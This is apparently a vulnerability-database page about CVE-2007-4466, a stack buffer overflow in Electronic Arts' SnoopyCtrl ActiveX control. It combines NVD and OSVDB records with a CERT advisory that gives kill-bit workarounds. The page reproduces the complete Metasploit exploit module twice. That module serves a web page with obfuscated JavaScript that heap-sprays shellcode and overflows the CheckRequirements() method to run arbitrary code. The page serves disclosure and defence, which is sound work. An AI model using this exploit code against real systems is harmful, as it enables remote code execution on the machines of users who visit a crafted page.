Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow
2009-10-15T15:22:16
ID MSF:EXPLOIT/WINDOWS/BROWSER/EA_CHECKREQUIREMENTS Type metasploit Reporter Rapid7 Modified 2017-10-05T21:44:36
Description
This module exploits a stack buffer overflow in Electronic Arts SnoopyCtrl ActiveX Control (NPSnpy.dll 1.1.0.36. When sending an overly long string to the CheckRequirements() method, an attacker may be able to execute arbitrary code.
{"id": "MSF:EXPLOIT/WINDOWS/BROWSER/EA_CHECKREQUIREMENTS", "type": "metasploit", "bulletinFamily": "exploit", "title": "Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow", "description": "This module exploits a stack buffer overflow in Electronic Arts SnoopyCtrl ActiveX Control (NPSnpy.dll 1.1.0.36. When sending an overly long string to the CheckRequirements() method, an attacker may be able to execute arbitrary code.\n", "published": "2009-10-15T15:22:16", "modified": "2017-10-05T21:44:36", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4466"], "cvelist": ["CVE-2007-4466"], "lastseen": "2020-10-06T05:17:19", "viewCount": 18, "enchantments": {"score": {"value": 8.0, "vector": "NONE", "modified": "2020-10-06T05:17:19", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-4466"]}, {"type": "cert", "idList": ["VU:179281"]}, {"type": "exploitdb", "idList": ["EDB-ID:16609"]}, {"type": "osvdb", "idList": ["OSVDB:37723"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83110"]}], "modified": "2020-10-06T05:17:19", "rev": 2}, "vulnersScore": 8.0}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/ea_checkrequirements.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}
{"cve": [{"lastseen": "2021-02-02T05:31:25", "description": "Multiple stack-based buffer overflows in Electronic Arts (EA) SnoopyCtrl ActiveX control (NPSnpy.dll) allow remote attackers to execute arbitrary code via unspecified methods and parameters.", "edition": 4, "cvss3": {}, "published": "2007-10-09T22:17:00", "title": "CVE-2007-4466", "type": "cve", "cwe": ["CWE-119", "CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-4466"], "modified": "2017-07-29T01:32:00", "cpe": ["cpe:/a:electronic_arts:snoopyctrl:*"], "id": "CVE-2007-4466", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-4466", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:electronic_arts:snoopyctrl:*:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:20:51", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-4466"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83110", "href": "https://packetstormsecurity.com/files/83110/Electronic-Arts-SnoopyCtrl-ActiveX-Control-Buffer-Overflow.html", "sourceData": "`### \n## This file is part of the Metasploit Framework and may be subject to \n## redistribution and commercial restrictions. Please see the Metasploit \n## Framework web site for more information on licensing and terms of use. \n## http://metasploit.com/projects/Framework/ \n### \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in Electronic Arts SnoopyCtrl \nActiveX Control (NPSnpy.dll 1.1.0.36. When sending a overly long \nstring to the CheckRequirements() method, an attacker may be able \nto execute arbitrary code. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ 'MC' ], \n'Version' => '$Revision:$', \n'References' => \n[ \n[ 'CVE', '2007-4466' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 1024, \n'BadChars' => \"\\x00\", \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ] \n], \n'DisclosureDate' => 'Oct 8 2007', \n'DefaultTarget' => 0)) \nend \n \ndef autofilter \nfalse \nend \n \ndef check_dependencies \nuse_zlib \nend \n \ndef on_request_uri(cli, request) \n# Re-generate the payload. \nreturn if ((p = regenerate_payload(cli)) == nil) \n \n# Encode the shellcode. \nshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) \n \nret = Rex::Text.uri_encode(Metasm::Shellcode.assemble(Metasm::Ia32.new, \"or al, 12\").encode_string * 2) \n \njs = %Q| \ntry { \nvar evil_string = \"\"; \nvar index; \nvar vulnerable = new ActiveXObject('SnoopyX.SnoopyCtrl.1'); \nvar my_unescape = unescape; \nvar shellcode = '#{shellcode}'; \n#{js_heap_spray} \nsprayHeap(my_unescape(shellcode), 0x0c0c0c0c, 0x40000); \nfor (index = 0; index < 5000; index++) { \nevil_string = evil_string + my_unescape('#{ret}'); \n} \nvulnerable.CheckRequirements(evil_string); \n} catch( e ) { window.location = 'about:blank' ; } \n| \n \nopts = { \n'Strings' => true, \n'Symbols' => { \n'Variables' => [ \n'vulnerable', \n'shellcode', \n'my_unescape', \n'index', \n'evil_string', \n] \n} \n} \njs = ::Rex::Exploitation::ObfuscateJS.new(js, opts) \njs.update_opts(js_heap_spray.opts) \njs.obfuscate() \ncontent = %Q| \n<html> \n<body> \n<script><!-- \n#{js} \n//</script> \n</body> \n</html> \n| \n \nprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\") \n \n# Transmit the response to the client \nsend_response_html(cli, content) \n \n# Handle the payload \nhandler(cli) \nend \n \nend \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83110/ea_checkrequirements.rb.txt"}], "osvdb": [{"lastseen": "2017-04-28T13:20:33", "bulletinFamily": "software", "cvelist": ["CVE-2007-4466"], "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:27143](https://secuniaresearch.flexerasoftware.com/advisories/27143/)\nISS X-Force ID: 37020\nFrSIRT Advisory: ADV-2007-3415\n[CVE-2007-4466](https://vulners.com/cve/CVE-2007-4466)\nCERT VU: 179281\nBugtraq ID: 25970\n", "edition": 1, "modified": "2007-10-08T00:00:00", "published": "2007-10-08T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:37723", "id": "OSVDB:37723", "title": "SnoopyCtrl ActiveX (NPSnpy.dll) Unspecified Method Arbitrary Code Execution", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cert": [{"lastseen": "2020-09-18T20:42:28", "bulletinFamily": "info", "cvelist": ["CVE-2007-4466"], "description": "### Overview \n\nThe Electronic Arts SnoopyCtrl ActiveX control and plug-in contains multiple stack buffer overflows, which could allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description \n\nElectronic Arts (EA.com) provides an ActiveX control and Netscape-style plug-in called SnoopyCtrl. This control, provided by `NPSnpy.dll`, is included with an EA.com update package. The SnoopyCtrl ActiveX control and plug-in contains buffer overflow vulnerabilities in multiple methods and initialization parameters. \n \n--- \n \n### Impact \n\nBy convincing a user to view a specially crafted HTML document (e.g., a web page or an HTML email message or attachment), a remote, unauthenticated attacker may be able to execute arbitrary code with the privileges of the user on a vulnerable system. \n \n--- \n \n### Solution \n\nWe are currently unaware of a practical solution to this problem. Please consider the following workarounds \n \n--- \n \n**Disable the SnoopyCtrl ActiveX control in Internet Explorer** \n \nThe vulnerable ActiveX control can be disabled in Internet Explorer by setting the kill bit for the following CLSID: \n \n`{525A15D0-4938-11D4-94C7-0050DA20189B}` \nMore information about how to set the kill bit is available in [Microsoft Support Document 240797](<http://support.microsoft.com/kb/240797>). Alternatively, the following text can be saved as a `.REG` file and imported to set the kill bit for this control: \n \n`Windows Registry Editor Version 5.00` \n \n`[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{525A15D0-4938-11D4-94C7-0050DA20189B}]` \n`\"Compatibility Flags\"=dword:00000400` \n**Disable the SnoopyCtrl plug-in in other browsers** \n \nThe SnoopyCtrl plug-in can be disabled in other browsers, such as Firefox, by removing the `NPSnpy.dll` file from the `plugins` directory. \n \n**Disable ActiveX** \n \nDisabling ActiveX controls in the Internet Zone (or any zone used by an attacker) appears to prevent exploitation of this and other ActiveX vulnerabilities. Instructions for disabling ActiveX in the Internet Zone can be found in the \"[Securing Your Web Browser](<http://www.cert.org/tech_tips/securing_browser/#Internet_Explorer>)\" document. \n \n**Disable plug-ins** \n \nDisabling plug-ins by default can prevent exploitation of this and other plug-in vulnerabilities. This can be accomplished by configuring [NoScript](<https://addons.mozilla.org/en-US/firefox/addon/722>) to `Forbid other plugins` for untrusted sites. \n \n--- \n \n### Vendor Information\n\n179281\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Electronic Arts __ Affected\n\nNotified: June 04, 2007 Updated: August 25, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease disable the vulnerable ActiveX control and plug-in.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23179281 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://secunia.com/advisories/27143/>\n * <http://www.securityfocus.com/bid/25970>\n * <http://support.microsoft.com/kb/240797>\n * <https://addons.mozilla.org/en-US/firefox/addon/722>\n\n### Acknowledgements\n\nThis vulnerability was reported by Will Dormann of the CERT/CC.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2007-4466](<http://web.nvd.nist.gov/vuln/detail/CVE-2007-4466>) \n---|--- \n**Severity Metric:** | 4.02 \n**Date Public:** | 2007-10-08 \n**Date First Published:** | 2007-10-08 \n**Date Last Updated: ** | 2007-10-09 13:40 UTC \n**Document Revision: ** | 14 \n", "modified": "2007-10-09T13:40:00", "published": "2007-10-08T00:00:00", "id": "VU:179281", "href": "https://www.kb.cert.org/vuls/id/179281", "type": "cert", "title": "Electronic Arts SnoopyCtrl ActiveX control and plug-in stack buffer overflows", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-02T00:14:59", "description": "Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow. CVE-2007-4466. Remote exploit for windows platform", "published": "2010-11-11T00:00:00", "type": "exploitdb", "title": "Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-4466"], "modified": "2010-11-11T00:00:00", "id": "EDB-ID:16609", "href": "https://www.exploit-db.com/exploits/16609/", "sourceData": "##\r\n# $Id: ea_checkrequirements.rb 10998 2010-11-11 22:43:22Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in Electronic Arts SnoopyCtrl\r\n\t\t\t\tActiveX Control (NPSnpy.dll 1.1.0.36. When sending a overly long\r\n\t\t\t\tstring to the CheckRequirements() method, an attacker may be able\r\n\t\t\t\tto execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'Version' => '$Revision: 10998 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-4466' ],\r\n\t\t\t\t\t[ 'OSVDB', '37723'],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ]\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Oct 8 2007',\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\r\n\tdef autofilter\r\n\t\tfalse\r\n\tend\r\n\r\n\tdef check_dependencies\r\n\t\tuse_zlib\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\t\t# Re-generate the payload.\r\n\t\treturn if ((p = regenerate_payload(cli)) == nil)\r\n\r\n\t\t# Encode the shellcode.\r\n\t\tshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\r\n\r\n\t\tret = Rex::Text.uri_encode(Metasm::Shellcode.assemble(Metasm::Ia32.new, \"or al, 12\").encode_string * 2)\r\n\r\n\t\tjs = %Q|\r\n\t\t\ttry {\r\n\t\t\t\tvar evil_string = \"\";\r\n\t\t\t\tvar index;\r\n\t\t\t\tvar vulnerable = new ActiveXObject('SnoopyX.SnoopyCtrl.1');\r\n\t\t\t\tvar my_unescape = unescape;\r\n\t\t\t\tvar shellcode = '#{shellcode}';\r\n\t\t\t\t#{js_heap_spray}\r\n\t\t\t\tsprayHeap(my_unescape(shellcode), 0x0c0c0c0c, 0x40000);\r\n\t\t\t\tfor (index = 0; index < 5000; index++) {\r\n\t\t\t\t\tevil_string = evil_string + my_unescape('#{ret}');\r\n\t\t\t\t}\r\n\t\t\t\tvulnerable.CheckRequirements(evil_string);\r\n\t\t\t} catch( e ) { window.location = 'about:blank' ; }\r\n\t\t|\r\n\r\n\t\topts = {\r\n\t\t\t'Strings' => true,\r\n\t\t\t'Symbols' => {\r\n\t\t\t\t'Variables' => [\r\n\t\t\t\t\t'vulnerable',\r\n\t\t\t\t\t'shellcode',\r\n\t\t\t\t\t'my_unescape',\r\n\t\t\t\t\t'index',\r\n\t\t\t\t\t'evil_string',\r\n\t\t\t\t]\r\n\t\t\t}\r\n\t\t}\r\n\t\tjs = ::Rex::Exploitation::ObfuscateJS.new(js, opts)\r\n\t\tjs.update_opts(js_heap_spray.opts)\r\n\t\tjs.obfuscate()\r\n\t\tcontent = %Q|<html>\r\n<body>\r\n<script><!--\r\n#{js}\r\n//</script>\r\n</body>\r\n</html>\r\n|\r\n\r\n\t\tprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\")\r\n\r\n\t\t# Transmit the response to the client\r\n\t\tsend_response_html(cli, content)\r\n\r\n\t\t# Handle the payload\r\n\t\thandler(cli)\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16609/"}]}